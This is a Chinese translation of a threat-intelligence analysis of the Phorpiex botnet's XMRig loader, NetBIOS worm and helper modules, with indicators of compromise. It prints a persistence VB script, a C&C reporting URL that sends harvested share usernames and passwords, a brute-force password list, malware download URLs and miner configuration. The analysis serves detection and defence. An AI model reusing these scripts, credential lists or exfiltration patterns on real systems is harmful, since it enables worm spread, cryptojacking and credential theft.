Phorpiex僵尸网络技术分析(二)
2020-03-21 10:20:00 Author: www.4hou.com(查看原文) 阅读量:585 收藏

Phorpiex僵尸网络技术分析

概述

近期,我们发布过一篇关于Phorpiex的分析文章,针对最近发现的恶意活动中所使用的僵尸网络技术进行了分析。本文将在此基础上,继续对其他部分进行深入分析,主要包括:

1、XMRig Silent Loader;

2、NetBIOS蠕虫模块;

3、辅助模块(包括根据地理位置定位的Loader和清理模块)。

XMRig Silent Loader

该模块的主要作用是启动嵌入式XMRig 门罗币挖矿工具。

门罗币(XMR)是一种去中心化的加密货币,所谓加密货币是指一种在用户网络中使用的安全数字现金形式。通过分布式共识来确认交易,然后按照实际情况记录到区块链上。

该加密货币之所以对恶意软件运营人员非常有吸引力,其原因在于该过程的匿名性:“门罗币无法追踪,默认情况下混淆了发送地址、接收地址和交易金额。门罗币区块链上记录的交易无法定位到特定用户或真实世界中的身份。”

门罗币挖矿工具包含称为XMRig的开源代码,是用于通过Phorpiex僵尸网络来获得收益的Payload之一。在我们以前的研究中,我们曾讨论过僵尸网络通过挖掘加密货币而获取收益的能力。被感染的计算机每月可以为恶意软件运营人员产生约15000美元的收入。

恶意软件运营人员所需做的,就是将挖矿工具投递到受感染的计算机上并运行。这就是XMRig Silent Loader模块(也称为XMRig Loader)的作用。挖矿工具及其参数(例如:用于挖矿和目标用户的线程数)使用简单的加密方式进行混淆,并嵌入到模块中。在执行之前,会将参数解密并传递给挖矿工具。

实际上,Phorpiex使用的XMRig Loader与在hxxps[://]xmrminer[.]net/网站上出售的XMRig Loader相同,很可能是从该网站上购买的。

网站上的挖矿工具说明:

1.png

该模块最初由Phorpiex Tldr加载并执行。但是,XMRig Loader模块具有其自身的持久性机制。因此,一旦首次执行,它就可以作为独立的恶意软件来运行。

XMRig Loader分析

Loader所执行的关键操作如下所示:

2.jpg

初始化

为了防止运行XMRig的多个实例,Loader会创建一个具有硬编码名称的互斥量。不同样本中使用的名称可能会有所不同。在我们所分析的样本中,观察到以下硬编码的变种:

· 4b293105d7b102179b20

· bf73f1604fc0b6b3d70d

设置持久性

Loader会将自身复制到“C:\ProgramData\{HardcodedFolder}\{HardcodedExecutable}”。

我们在不同的样本中,发现“{HardcodedExecutable}”参数有不同的值,包括:

· cfgmgr.exe

· windrv32.exe

· sysdrv32.exe

路径“C:\ProgramData\{HardcodedFolder}”也用于存储临时文件,例如VB脚本和传递给挖矿工具的配置。

我们在不同的样本中,发现“{HardcodedFolder}”参数有不同的值,包括:

· FeSdavbMaL

· ADwXcSSGvY

然后,该恶意软件在启动文件夹中创建一个指向自我复制的链接:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\{HardcodedFilename}.url

在不同的样本中,发现“{HardcodedFilename}”参数有不同的值,包括:

· kBBcUBIbha

· LtHgNeMqRB

下图展示了启动文件夹中的链接,以及可执行文件的路径:

3.png

我们发现一个值得注意的事情是,Loader会根据系统功能中是否存在以下Emsisoft反恶意软件进程,来选择启动URL的方法:

· a2guard.exe

· a2service.exe

· a2start.exe

如果未检测到这些进程,就会通过执行以下VBS创建启动链接。

由恶意软件创建目录内的VB脚本:

4.png

Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile="C:\Users\Lab\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kBBcUBIbha.url"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\ProgramData\FeSdavbMaL\cfgmgr.exe"""
objFile.Close

如果VB脚本无法创建这个启动配置,或者检测到上面列出的任何Emsisoft进程,那么就会使用“经典的”WinAPI函数,并直接从加载程序中调用。

该函数内部还有一个额外的检查,使用VBS来检查是否正在运行任何反恶意软件相关进程。通常,VBS是使用以下命令来执行:

cmd.exe /C WScript “C:\ProgramData\FeSdavbMaL\r.vbs”

如果发现以下任何进程,则使用线程注入(请参考线程注入一节)代替cmd的直接调用:

· bdagent.exe

· vsserv.exe

· cfp.exe

· ccavsrv.exe

· cmdagent.exe

· avp.exe

· avpui.exe

· ksde.exe

这里,同时支持x86和x64结构。对于x86来说,Loader将搜索explorer.exe。对于x64来说,将会枚举所有进程,但是会忽略以下两个进程:

· csrss.exe

· winlogon.exe

在建立可访问进程的列表后,将选择其中的第一个进行注入。该过程中会将完整的Loader都注入到进程中,但是仅执行其中第一个函数。

下图展示了以上的所有过程:

5.png

线程注入

进行线程注入的目的,是为了通过VBS执行来创建启动配置(与上一节中描述的脚本相同):

cmd.exe /C WScript “C:\ProgramData\FeSdavbMaL\r.vbs”

加密

Loader配置值与XMRig挖矿工具Payload使用XOR加密。解密密钥“0125789244697858”被硬编码到二进制文件中。在解密后,我们将得到以下配置值:

1、C&C服务器URL:http://185.176.27[.]132/update.txt

2、XMR加密钱包(由用户ID重写,但直接在其他Phorpiex模块中使用):4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV

3、矿池:176.27.132:4545(原文有误,根据后文截图推测为185[.]176.27.132:4545)

执行挖矿

整个挖矿程序可执行文件使用硬编码的XOR密钥解密(请参阅“加密”部分):

6.png

挖矿代码从“C:\Windows\System32”目录(即wuapp.exe)注入到新创建的进程的地址空间中。如果由于某种原因,在获取wuapp.exe的属性时GetFileAttributes返回null,则会启动svchost.exe。

在执行挖矿工具注入和挖矿执行过程中,Loader将检查taskmgr.exe的状态。如果检测到任务管理器正在运行,那么Loader将会终止挖矿工具的运行,并通过无限循环的方式挂起,直至任务管理器不再执行。由于在循环中使用了Sleep(4)函数,因此没有CPU消耗。当没有检测到taskmgr.exe时,挖矿工具将再次启动。

在创建新的进程后,将使用称为Hollowing的技术将挖矿工具注入到该位置。

这里,有一个命令行选项“–show-window”,可以使挖矿窗口可见:

cfgmgr.exe --show-window

下面的屏幕截图展示了该窗口:

7.png

在挖矿工具启动后,Loader将连接到服务器以获取其他指令(如果存在)。有关更多详细信息,可以参考下面的网络通信部分。

XMRig挖矿工具是最终的Payload,来源于GitHub。

注入细节

Loader会映射其自身的ntdll.dll副本,在这里搜索必要的函数,对这些函数进行内部数组指针处理,然后再进行调用。上述所有的过程,都导致用户模式挂钩完全无效。

Ntdll.dll的地址是通过PEB获得的:

8.png

ESI包含ntdll.dll的地址:

ESI 777A000 ntdll.777A000

可以在以下位置找到这个方法的说明(稍作修改):

https://reverseengineering.stackexchange.com/questions/4465/where-is-ntdll-dll

可以通过目录对象“KnownDlls\ntdll.dll”(代表ntdll.dll库的内容以便访问)来访问该库本身,我们可以在这里找到代码示例:

https://community.osr.com/discussion/268187

在这个导出进程后,将解析一段代码。这段代码负责检索必要函数的地址,并将其写入内部数组,以备日后调用。

挖矿配置

加载程序将配置保存到“C:\ProgramData\{HardcodedFolder}\cfg”,并将其作为命令行参数传递到挖矿工具。有关“{HardcodedFolder}”参数的可能值,请参阅持久性的部分。

挖矿配置具有以下结构:

{
       "algo": "cryptonight",
       "autosave": false,
       "background": false,
       "colors": true,
       "retries": 5,
       "retry-pause": 5,
       "syslog": false,
       "print-time": 60,
       "av": 0,
       "safe": false,
       "cpu-priority": null,
       "cpu-affinity": null,
       "donate-level": 0,
       "threads": 1,
       "pools": [
              {
                     "url": "185.176.27.132:4545",
                     "user": "ea7c252d-5590-4983-995d-02a1a35bb966",
                     "pass": "x",
                     "keepalive": false,
                     "nicehash": false,
                     "variant": "r",
                     "tls": false,
                     "tls-fingerprint": null
              }
       ],
       "api": {
              "port": 0,
              "access-token": null,
              "worker-id": null
       }
}

其中的部分代码不是确定的,可以在Loader内部进行修改。但是,通过更详细的分析,我们发现了它其中具有的伪变量性质,我们可以将所有值都视为是常量。

在我们所研究的样本中,所有的配置值都设置为硬编码的,“线程”值设置为等于系统中处理器的数量。

挖矿算法在“variant”字段中设置。在这里,其使用的算法为“CryptoNightR”(门罗币变种4)。

未使用的信息

在Loader执行期间,我们发现内存中保存的XMR钱包。不同的样本中可能会使用不同的钱包。根据我们目前的观察,这里的钱包地址与其他Phorpiex模块中所使用的相同。· 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV

· 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoMMyaX2Eun2XCgFYq

这样一来,我们就需要了解该模块中XMR钱包地址的用途。我们检查了所有可能会使用到的地方,发现该位置已经使用用户ID(相当于计算机GUID)进行了重写,然后进行了配置:

9.png

网络通信

XMRig Loader检查C&C服务器上是否包含任何新的指令,并执行找到的指令。通信过程总共执行两次,在挖矿注入前和挖矿注入后。这里使用没有加密过的纯HTTP协议。

我们在相应的字段中找到了这些特定值:

Accept字段:text/*, application/exe, application/zlib, application/gzip, application/applefile

User-Agent字段:WinInetGet/0.1

支持的命令

我们可以在出售Loader的网站(xmrminer[.]net)上找到受支持的命令的描述。需要注意的是,访问该网站可能不安全。

下面使用从C&C服务器发送命令时的格式,列出了这些命令,其中保留了原始注释:

[Miner]
address=YOUR_XMR_ADDRES ; XMR address, email (minergate), btc address (nicehash), etc.
poolport=pool.minexmr.com:4444 ; Do not include 'stratum+tcp://' e.g monerohash.com:3333
password=x ; Pool password
stop=0 ; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work.
proxy=0 ; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.
keepalive=0 ; 0 to disable keepalive, 1 to enable keepalive
 
[Update]
;config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://"
knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes.
;update_url=http://mysite.com/new_miner ; url of new miner. Miner will get updated with this file.
;update_hash=xxxxxxxxxx ; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!
 
;End of configuration. Do not remove this line, ";End" string specifies end of configuration file.
 
;Everything after a ";" character is a comment, so it is ignored by the miner when parsing the configuration. Only the ";" character is used for this purpose.
;Always include the appropriate options below the defined "[Miner]" and "[Update]" sections. If you do not include the section names it won't work.
;Make sure everything is spelled correctly
;If you specify "config_url" double check it is correctly spelled, otherwise the miner that reads an incorrect url will never go back to a correct url (i.e. last configuration will be locked).

服务器可以从任何子部分([Miner]或[Update])发送命令,并且可以以独立或组合的方式发送命令。

我们在下面列出了观察到的命令的样本。

1、挖矿工具更新

图10-从C&C服务器获取更新

操作摘要:检索并下载新挖矿工具的URL。

2、挖矿工具停止

从服务器收到“Stop miner”命令:

11.png

图11-从服务器接收到“停止矿工”命令。

这也是非常容易理解的。需要注意的是,服务器可能会请求其他文件名。

我们遇到过的文件名称包括:

· c.txt

· upd.txt

· newup.txt

· update.txt

· xmrupdate.txt

Phorpiex NetBIOS蠕虫模块

该模块代表一种自我传播的蠕虫,还包括用于下载其他Payload的功能。

NetBIOS蠕虫会扫描随机IP地址,以查找开放的TCP/139端口(NetBIOS),并使哟功能用户名和密码的硬编码列表进行暴力破解。攻击本身是无限循环进行的。使用rand()函数随机生成用于扫描的IP地址,并将GetTickCount()的结果作为随机种子。IP地址的唯一过滤规则是不能以127、172或192开头。将会创建一个单独的线程与每个IP地址进行通信。大家也许会发现,这里的扫描功能与Phorpiex VNC蠕虫模块中的扫描功能非常类似。

NetBIOS蠕虫通过创建具有硬编码名称的互斥锁(不同样本中所使用的名称各不相同)来防止在多个实例中多次执行。如果互斥锁已经存在,则会停止执行。

如果是由Phorpiex Tldr加载的,则会使用伪随机名称保存该模块。在自我传播阶段,恶意软件会使用“WindowsDefender.exe”名称上传其自身。在这种情况下,NetBIOS蠕虫必须下载Phorpiex主模块或其他Payload。因此,恶意软件必须通过GetModuleFilename()获取其文嘉铭。如果名称为“WindowsDefender.exe”,则它将尝试从硬编码的URL下载并执行文件。

通过NetBIOS蠕虫下载Payload:

12.png

我们在不同的样本中,观察到以下URL:

· hxxp://92.63.197.153/NB.exe

· hxxp://92.63.197.153/nb.exe

· hxxp://193.32.161.77/CRAZYBLAYNE.exe

· hxxp://92.63.197.153/enum.exe

· hxxp://193.32.161.77/enum.exe

· hxxp://193.32.161.77/aldenta.exe

最后,将进行无限循环的网络扫描。对于每个随机生成的IP地址,NetBIOS模块都会启动一个线程,首先在该线程中检查TCP/139端口是否在目标主机上进行侦听。成功连接后,NetBIOS蠕虫会尝试通过调用NetShareEnum() API函数来枚举网络共享。它只会选择当前与资源建立连接的共享。

选择网络共享进行暴力破解攻击:

13.png

Phorpiex NetBIOS蠕虫会尝试使用用户名和密码的硬编码列表连接到网络共享。

用于暴力破解攻击的凭据:

14.png

密码列表中通常包括非常简单的值,例如“123”、“admin”、“Administrator123”等。

暴力破解过程中,会尝试4个用户名:

· Administrator

· administrator

· Admin

· admin

在成功连接到网络资源后,恶意软件会尝试将其自身复制到以下位置:

· WindowsDefender.exe

· WINDOWS\All Users\StartMenu\Programs\Startup\WindowsDefender.exe

· WINDOWS\StartMenu\Programs\Startup\WindowsDefender.exe

· WINNT\Profiles\All Users\StartMenu\Programs\Startup\WindowsDefender.exe

· ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\WindowsDefender.exe

· Users\All Users\Microsoft\Windows\Start Menu\Programs\WindowsDefender.exe

· Documents and Settings\All Users\StartMenu\Programs\Startup\WindowsDefender.exe

当目标路径指向启动文件夹时,恶意软件将有能力创建其自身在目标系统中的持久性。

最后一步是在目标主机上调用上传样本的执行,共有两种执行方式:

1、在远程主机上创建新的服务器。恶意软件使用名称“NetBIOS Windows Defender”创建服务,显示的名称为“NetBIOSWindowsDefender”,创建的服务类型为SERVICE_WIN32_SHARE_PROCESS,以SERVICE_AUTO_START作为启动类型。

2、在远程主机上创建计划任务。新任务的预定时间为当前时间+120秒。为此,恶意软件通过调用NetRemoteTOD() API函数来获取远程时间,并针对特定的时区进行更正。

上述操作是针对每个网络路径来执行的。

在进行每次成功操作之后,都会使用下列格式的HTTP请求向C&C服务器报告:

snwprintf(url, L"hxxp://92.63.197.153/e.php?srv=%ls|%ls|%ls|%ls", NetLocation, UserName, Password, Message);

在HTTP请求中所使用的用户代理是:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0

该恶意软件可以发送以下消息:

1、消息:CONNECTED!

描述:成功连接所选的用户名和密码

示例:hxxp://92.63.197.153/e.php?srv=?\\1.1.1.1\C$|Administrator|123|CONNECTED!

2、消息:COPIEDFILE

描述:恶意软件Payload已上传

示例:hxxp://92.63.197.153/e.php?srv=\\1.1.1.1\C$\ProgramData\Microsoft\Windows\Start%20Menu\Programs\StartUp\WindowsDefender.exe|Administrator|123|COPIEDFILE

3、消息:CreateServiceW

描述:服务已创建

示例:hxxp://92.63.197.153/e.php?srv=\\1.1.1.1\C$\ProgramData\Microsoft\Windows\Start%20Menu\Programs\StartUp\WindowsDefender.exe|Administrator|123|CreateServiceW

4、消息:NetScheduleJobAdd

描述:任务已创建

示例:hxxp://92.63.197.153/e.php?srv=\\1.1.1.1\C$\ProgramData\Microsoft\Windows\Start%20Menu\Programs\StartUp\WindowsDefender.exe|Administrator|123|NetScheduleJobAdd

我们还在其他样本中观察到了下面的这些消息:

1、消息:COPiED

描述:恶意Payload已上传

2、消息:SVC-NEWWW

描述:恶意服务已创建

3、消息:SVC-NEW

描述:恶意服务已创建

4、消息:SVC-EXEC

描述:恶意服务已启动

5、消息:Sched-EXEC-NEW

描述:恶意任务已创建

6、消息:Sched-EXEC-OLD

描述:恶意任务已创建

我们在各种样本中,观察到以下的报告URL:

· hxxp://193.32.161.77/nb.php?srv=

· hxxp://193.32.161.77/exec.php?srv=

· hxxp://193.32.161.77/nn.php?srv=

· hxxp://193.32.161.77/gud.php?srv=

· hxxp://193.32.161.77/go.php?srv=

· hxxp://193.32.161.77/netb.php?srv=

· hxxp://193.32.161.77/ok.php?srv=

· hxxp://92.63.197.153/e.php?srv=

· hxxp://92.63.197.153/huh.php?srv=

· hxxp://92.63.197.153/nb.php?srv=

· hxxp://92.63.197.153/tst.php?srv=

· hxxp://92.63.197.153/ya.php?nb=

辅助模块

如我们所见,Phorpiex的通用性非常强。似乎主模块在接收到“命令”队列后,每个命令都是一个单独的可执行模块。与我们先前描述的相反,我们还观察到功能非常有限的微型模块的许多不同变体。其中有一些,甚至无法被判断为恶意。

Phorpiex加载的这类小型可执行文件其中的一个示例是清理模块。它包含两个函数,其唯一目的是终止具有特定硬编码名称的进程,并删除多个注册表自动运行条目。

清理模块终止的进程列表包括:

· winsrvc32.exe

· winupsvcmgr.exe

· winsvcinstl.exe

· winupd32svc.exe

· wincfg32svc.exe

· windrv.exe

· wincfgrmgr32.exe

· winmgr.exe

· wincfg.exe

· wincfg32.exe

· winupd.exe

· winupd32.exe

· winsvcin32.exe

· winupd32cfg.exe

· winmgr32cfg.exe

· csrssc.exe

· csrsscxn.exe

· winsecmgr.exe

· winsecmgrv.exe

· windrvmgr32.exe

清理模块还从注册表项“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”中删除以下值:

· WinCfgMgr

· Windows Update Service Manager

· Microsoft Windows Update Services

· Microsoft Update 495036

· Microsoft Windows Service Installer

· Microsoft Windows Driver Configuration

· Microsoft Windows Installer Svc

· Windows Security Manager

该模块禁用过时的Phorpiex模块,例如Phorpiex Trik。不同的Phorpiex模块使用特定的进程名称作为在被感染系统内部的伪装(例如:cfgmgr.exe、windrv32.exe等)。举例来说,Phorpiex Trik v2.8版本使用进程名称“winmgr.exe”。

Phorpiex Trik v2.8使用的文件名:

16.png

辅助模块的另一种类型是根据地理位置定位的Loader。它使用服务api.wipmania.com来确定受感染计算机的位置。如果返回的代码在白名单内,则恶意软件会从硬编码的URL下载Payload:

17.png

在2019年初,我们看到了针对中国和越南的Loader,并根据具体的位置,将GandCrab勒索软件的不同变种加载到受感染的计算机上。

在GandCrab的开发人员“退休”后,Phorpiex开始在针对特定地理位置的恶意活动中投放Raccoon Stealer。其目标包括印度、印度尼西亚、墨西哥、秘鲁、孟加拉国、巴基斯坦、伊朗、厄瓜多尔和巴西。

总结

Phorpiex是一个非常特殊的恶意软件家族,其功能包括具有粒度功能的微模块。与具有多种不同功能的一体化恶意软件不同,这里有一个类似于构造函数的恶意软件,每个功能模块都承担着特定的任务,例如发送垃圾邮件的模块、用于感染的蠕虫模块等等。如果需要新的功能,那么就引入新模块,而无需重建或重新配置现有的模块。这样的方法不易出错、耗时较少,可以为恶意软件开发人员节省大量精力。

这一恶意软件的风险非常值得关注。迄今为止,Porpiex已经感染了超过100万台计算机,并为其作者带来了可观的利润。我们需要知道,目前我们所能看到的与实际情况相比,估计只是冰山的一角。目前,Phorpiex家族中已经有Raccoon Stealer和Predator The Thief脱颖而出,预计后续还有更多的方法可以实现其恶意活动。

Phorpiex清晰展示了恶意软件家族如何通过不断发展而逐步成为流行。在其发展过程中,完全没有用到复杂的技巧,包括反调试技术、模糊处理等等。

威胁指标

XMRig Slient Loader

MD5:b059cd4b912edd6ca6aad3334e42dbae

矿池:92.63.197.153:9090

更新URL:http://92.63.197.153/c.txt

MD5:36e824615d72d11a3f962ec025bfceba

矿池:185.176.27.132:4545

更新URL:http://185.176.27.132/update.txt

MD5:7f8880c0bc2dd024a3cf5261b6582313

矿池:92.63.197.153:7575

更新URL:http://92.63.197.153/update.txt

MD5:a8ab5aca96d260e649026e7fc05837bf

矿池:193.32.161.69:5555

更新URL:http://193.32.161.69/upd.txt

MD5:d894eb9194a5cb428520914f5521f178

矿池:193.32.161.73:7777

更新URL:http://193.32.161.73/update.txt

MD5:e9c27bbfbf386c55d0672c8a580c13ef

矿池:193.32.161.77:9595

更新URL:http://193.32.161.77/xmrupdate.txt

MD5:b5f1ba1cbf0e402b9a412edce8c6ca28

矿池:92.63.197.60:9090

更新URL:http://92.63.197.60/newup.txt

互斥量名称

0fe420b0eb8396a48280

3f3ff4de39fc87f8152a

4b293105d7b102179b20

5d6eb4d965fd09330511

a6c92143cac02de51d4a

bf73f1604fc0b6b3d70d

ff9702c705fd434610c0

在各种样本中发现的常量字符串:

0125789244697858

f23e1993dfdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

objFile.Write “[InternetShortcut]” & vbCrLf & “URL=””file:///

Phorpiex NetBIOS蠕虫模块

79a9b27bebf2d5dc61b44e51a576e585   hxxp://osheoufhusheoghuesd[.]ru/3.exe

4ca68f9575c366e4156429aa51edec98     hxxp://osheoufhusheoghuesd[.]ru/2.exe

b405cb01f9664b35e351c85ae368a662    hxxp://osheoufhusheoghuesd[.]ru/5.exe

00a30dd47d891979d19743279d9632c7   hxxp://osheoufhusheoghuesd[.]ru/5.exe

7f2906a696b27f63859d9250876908f6     hxxp://osheoufhusheoghuesd[.]ru/3.exe

URL

hxxp://92.63.197.153/NB.exe

hxxp://92.63.197.153/nb.exe

hxxp://193.32.161.77/CRAZYBLAYNE.exe

hxxp://92.63.197.153/enum.exe

hxxp://193.32.161.77/enum.exe

hxxp://193.32.161.77/aldenta.exe

在不同示例中观察到的NetBIOS蠕虫模块暴力破解攻击所使用的密码列表:

Administrator

administrator

Admin

admin

Admin123

admin123

Admin12345

admni12345

password

Password

PASSWORD

password123

passwd

pass

pass123

123

1234

12345

123456

1234567

12345678

123123

654321

54321

4321

321

server

Server

srv

user

User

USER

user123

testuser

test

test1

testtest

test123

testing

qwerty

1q2w3e

abc

abcde

abcabc

asd

asdf

abc123

computer

internet

secure

changme

boss

desktop

desk

temp

windows

public

master

lan

lan123

LAN

net

network

demo

setup

backup

letmein

sysadmin

mysql

monitor

operator

monkey

money

辅助模块

39db80011f66bd6a67b717e6e4f875ba    清理模块

88fa70f752612c03b6cb9718a1248778     清理模块

b943cb767c772ebb6f0c7c80ff98cc3e       清理模块

9c6fc641121324152ed4e1958fd09a65     清理模块

cf904ade613134cbf505050fbfd1b7fa       VNC蠕虫模块

250d6ceed2c29a281a4a135b7234056a    地理位置定位Loader(GandCrab)

f44b6e0aed5ba70ea123ede5942ffaae      地理位置定位Loader(Raccoon)

db931ca9471c69d11df0f70089cb96f4      地理位置定位Loader(Raccoon)

5b12844df9f807fdd3020266f211168e      地理位置定位Loader(Raccoon)

1d053f476509e9100b1f98fef9de7cc7      地理位置定位Loader(Raccoon)

URL

http://92.63.197.153/KrabGEO.exe

http://92.63.197.153/KrabLang.exe

http://193.32.161.77/stl.exe

http://185.176.27.132/inf/n.exe

http://185.176.27.132/p.exe

Check Point Anti-Bot blade可以抵御以下威胁:

Worm.Win32.Phorpiex.C

Worm.Win32.Phorpiex.D

Worm.Win32.Phorpiex.H

本文翻译自:https://research.checkpoint.com/2020/phorpiex-arsenal-part-ii/如若转载,请注明原文地址:


文章来源: https://www.4hou.com/posts/J70J
如有侵权请联系:admin#unsafe.sh